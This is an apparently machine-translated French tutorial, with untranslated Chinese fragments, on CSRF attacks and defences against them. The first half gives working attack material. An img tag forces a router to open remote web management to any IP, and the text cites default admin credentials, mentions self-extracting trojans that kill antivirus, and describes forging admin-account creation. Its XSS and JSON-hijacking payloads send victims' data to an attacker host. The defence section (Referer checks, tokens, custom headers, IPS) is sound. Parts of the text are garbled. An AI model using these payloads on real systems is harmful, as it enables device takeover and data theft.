CSRF Phishing ajoute un compte administrateur et des précautions de sécurité
Annuaire
- CSRF Phishing ajoute un compte administrateur et des précautions de sécurité
- Attaque CSRF de périphérique de réseau local
- CSRF pas de cas de navigateur
- burp ajouter un compte administrateur
- Résumé
- Modèle de ver CSRF
- Il n'y a presque aucune restriction sur les données obtenues par les attaques CSRF dans le même domaine
- Plusieurs méthodes pour obtenir des données à partir d'attaques CSRF interdomaines sont résumées ci-dessous
- 1, XSS
- 2. Technologie d'agent de serveur
- 3, Hijacing JSON
- 4 、 Flash AsctionScript (crossdomain.xml)
- Les données clés à obtenir sont un identifiant unique
- Prévention de la vulnérabilité CSRF
- Défense du serveur
- Vérifiez le champ HTTP Referer
- Ajouter un jeton pour demander l'adresse et vérifier
- Personnalisez les attributs dans l'en-tête HTTP et vérifiez
- Distinguer strictement les demandes de données POST et GET dans la zone du serveur
- Confirmez avec un code de vérification ou un mot de passe
- Défense des utilisateurs
- Défense des équipements de sécurité
Attaque CSRF de périphérique de réseau local
Dans des circonstances normales, le réseau externe n'est pas accessible, tout comme le matériel tel que les commutateurs. Si vous souhaitez accéder au périphérique réseau interne, que devez-vous faire? Notez que de nombreux périphériques réseau internes sont les mots de passe par défaut.
Tout d'abord, connectez-vous en tant qu'utilisateur normal et entrez dans le routeur pour l'ouvrir. Port de gestion Web, puis utilisez burp pour capturer des paquets et obtenir des adresses
<img
src=http://192.168.1.1/userRpm/ManageControlRpm.htm?port=80&ip=255.255.255.255&Save=
%B1%A3+%B4%E6>
Insérez ce code d'attaque à l'endroit où vous souhaitez l'insérer, trompez la société de l'autre partie pour accéder à cette adresse, après avoir accédé au port de gestion Web à distance de l'appareil de l'autre partie pour ouvrir les
trois fonctions de ce code d'attaque, ouvrez d'abord le port 80, modifiez l'adresse IP de gestion Web à distance Enregistrez sous 255.255.255.255.
Notez que dans l'état de connexion, lorsque l'attaquant visite une page Web avec un code d'attaque CSRF, il est "forcé" d'ouvrir la
fonction "gestion WEB à distance "
. L'attaque CSRF initiée par la méthode GET, via des travailleurs sociaux, etc. La méthode permet à la victime d'accéder au fichier CSRF d'un site malveillant.
Le nom d'utilisateur et le mot de passe par défaut de la gestion WEB du routeur haut débit sans fil FAST: admin.
CSRF pas de cas de navigateur
Incorporez le code d'attaque dans l'option auto-extractible à
ajouter.
Lorsque vous effectuez une fonction anti-destruction, vous pouvez également utiliser cette fonction comme un cheval de Troie auto-extractible pour tuer le logiciel antivirus.
Vous pouvez diviser un cheval de Troie.
Commencez par diviser le registre dans le formulaire. Divisez la
partie mémoire, puis divisez l'
élément de démarrage. Fractionnez le formulaire d'importation et
ajoutez enfin un formulaire .exe automatique
burp ajouter un compte administrateur
Lorsque le site Web est open source, recherchez le code pour ajouter un compte administrateur, simulez le package de données pour ajouter un administrateur, puis modifiez-le. Modifiez simplement l'adresse pour attaquer le site Web, incorporez-le à un programme malveillant et incitez l'administrateur à se déclencher dans l'état de gestion.
Résumé
Le seuil d'attaque CSRF n'est pas très élevé, mais ce type d'attaque doit être basé sur la session, c'est-à-dire que la victime doit exécuter du code malveillant sous l'état de connexion, ce qui nous oblige à combiner CSRF avec d'autres méthodes d'attaque pour construire le code d'attaque + exécution de phishing Code
Modèle de ver CSRF
Il n'y a presque aucune restriction sur les données obtenues par les attaques CSRF dans le même domaine
Plusieurs méthodes pour obtenir des données à partir d'attaques CSRF interdomaines sont résumées ci-dessous
1, XSS
使用目标站点上的 XSS 漏洞
> <iframe width=0 height=0 src=‘http://目标站点/search.php?k=“><script
> src=http://恶意站点/get.js></script>’></iframe>
Le code pour http: // site malveillant / get.js est:
//use DOM method to get your data
new Image(). src=‘http://恶意站点/do.php?data=‘+yourdata;
Le fichier do.php du site malveillant reçoit des données telles qu'un identifiant unique. L'identifiant unique peut être dans l'url ou
dans le contenu correspondant à l' url du site cible .
2. Technologie d'agent de serveur
3, Hijacing JSON
使用 JSON Hijacking 技术:
Le site cible utilise les données JSON pour transférer les données privées des utilisateurs.
Les données privées contiennent des informations telles que l'identification unique dont nous avons besoin.
<script>
function hijack(o){
//use DOM method to get your data
new Image().src="http://192.168.1.2/JSONHiJack.asp?hi="+escape(data);
}</script>
<script
src=http://api.fanfou.com/private_messages/inbox.json?callback=hijack&count=2></script>
4 、 Flash AsctionScript (crossdomain.xml)
Utilisez des scripts Flash ActionScript. Le
fichier crossdomain.xml doit exister sous le site cible. La configuration dans crossdomain.xml permet aux
scripts AS d' autres domaines d' effectuer des demandes interdomaines
.
Les données clés à obtenir sont un identifiant unique
Identifiant utilisateur, pseudo utilisateur, adresse e-mail utilisateur, adresse de page personnelle de l'utilisateur, etc.
Prévention de la vulnérabilité CSRF
Défense du serveur
Vérifiez le champ HTTP Referer
Selon le protocole HTTP, il y a un champ dans l'en-tête HTTP appelé Referer, qui enregistre l'
adresse source de la requête HTTP . Dans des circonstances normales, une demande d'accès à une page à sécurité limitée doit provenir du même site Web.
Par exemple, un virement bancaire est effectué par l'utilisateur accédant à la page http: //bank.test/test? Page = 10 & userID = 101 & money = 10000. L'utilisateur doit d'abord se connecter à la banque. Testez, puis déclenchez l'événement de virement en cliquant sur le bouton de la page.
Lorsque l'utilisateur soumet la demande, la valeur Referer de la demande de transfert sera l'URL de la page où se trouve le bouton de transfert (dans ce cas, il s'agit généralement d'une adresse commençant par la banque. Tester le nom de domaine).
Si l'attaquant souhaite mettre en œuvre une attaque CSRF sur le site Web de la banque, il ne peut construire une demande que sur son site Web. Lorsque l'utilisateur envoie une demande à la banque via le site Web de l'attaquant, le référent de la demande pointe vers le site Web de l'attaquant. Par conséquent, pour se défendre contre les attaques CSRF, le site Web de la banque doit uniquement vérifier la valeur du référent pour chaque demande de transfert. Si le nom de domaine commence par la banque. Test, la demande provient de la propre demande du site Web de la banque et est légale. Si le référent est un autre site Web, il peut s'agir d'une attaque CSRF et la demande est rejetée.
Ajouter un jeton pour demander l'adresse et vérifier
La raison pour laquelle l'attaque CSRF est réussie est que l'attaquant peut forger la demande de l'utilisateur et que toutes les informations d'authentification de l'utilisateur dans la demande se trouvent dans le cookie, de sorte que l'attaquant peut utiliser directement le propre cookie de l'utilisateur sans connaître les informations de vérification. Pour passer la vérification de sécurité.
On peut voir que la clé pour résister aux attaques CSRF est de mettre dans la demande des informations que l'attaquant ne peut pas falsifier et que les informations n'existent pas dans le cookie . Compte tenu de cela, le développeur du système peut ajouter un jeton généré de manière aléatoire sous forme de paramètres à la demande HTTP et établir un intercepteur sur le serveur pour vérifier le jeton. S'il n'y a pas de jeton dans la demande ou si le contenu du jeton est incorrect, il peut être considéré CSRF attaque et rejette la demande.
Personnalisez les attributs dans l'en-tête HTTP et vérifiez
自定义属性的方法也是使用 token 并进行验证,和前一种方法不同的是,这里并不是把 token
Mettez-le dans la requête HTTP en tant que paramètre, mais placez-le dans un attribut personnalisé dans l'en-tête HTTP.
Grâce à la classe XMLHttpRequest, vous pouvez ajouter l'attribut d'en-tête HTTP csrftoken à toutes les demandes de ce type à la fois et y mettre la valeur du jeton. Cela résout l'inconvénient d'ajouter des jetons à la demande dans la méthode précédente. Dans le même temps, l'adresse demandée via cette classe ne sera pas enregistrée dans la barre d'adresse du navigateur, et il n'est pas nécessaire de s'inquiéter que le jeton soit divulgué à d'autres sites Web via le référent
Distinguer strictement les demandes de données POST et GET dans la zone du serveur
如在 asp 中不要使用 Request 来直接获取数据。同时建议不要用 GET 请求来执行持久
Opérations sexuelles, telles que: http://www.yeeyan.com/space/deleteEvent/16824.
Confirmez avec un code de vérification ou un mot de passe
Cette méthode est très efficace, mais l'expérience utilisateur est pire.
Par exemple, pour changer le mot de passe, vous devez entrer le code de vérification ou le mot de passe d'origine
Défense des utilisateurs
Il n'est pas réaliste pour les utilisateurs ordinaires d'apprendre et de posséder des connaissances en matière de sécurité réseau pour se défendre contre les attaques réseau. Mais si les utilisateurs développent de bonnes habitudes en ligne, ils peuvent réduire considérablement les méfaits des attaques CSRF.
L'administrateur système , l'utilisateur le plus important, doit essayer de cliquer sur les liens et les images inconnus lors de la déconnexion du système. De plus, les utilisateurs doivent également installer un logiciel de protection de sécurité approprié sur l'ordinateur connecté à Internet et mettre à jour la base de données de signatures publiée par le fabricant du logiciel à temps pour maintenir un suivi en temps réel des dernières attaques du logiciel de sécurité.
Défense des équipements de sécurité
Comme il faut un certain temps entre la découverte des vulnérabilités et la publication des correctifs, et qu'un pourcentage considérable de fabricants ne répondent pas positivement aux vulnérabilités, et certains administrateurs système ne prêtent pas assez d'attention aux correctifs système, cela donne aux attaquants une opportunité. Compte tenu des circonstances ci-dessus, les utilisateurs peuvent utiliser des équipements de sécurité professionnels tiers pour renforcer la défense contre les vulnérabilités CSRF.
L'essence de l'attaque CSRF est que l'attaquant s'est forgé une identité légale pour accéder au système. Si vous pouvez identifier
la fausse identité du visiteur , vous pouvez également identifier l'attaque CSRF. La recherche a révélé que les produits de sécurité de certains fournisseurs peuvent
vérifier le contenu du champ Referer de l' en-tête HTTP en fonction du niveau matériel pour identifier rapidement et avec précision les attaques CSRF. À l'heure actuelle, les produits IPS de H3C utilisent une technologie spéciale pour prendre en charge la détection et le blocage des attaques de vulnérabilité CSRF de certains systèmes couramment utilisés. La première
méthode
consiste à faire correspondre le trafic réseau avec le code de signature de la base de données de signatures.
Caractéristiques des coups
Signaler les journaux d'attaque
Aucune frappe caractéristiques de
libération de flux
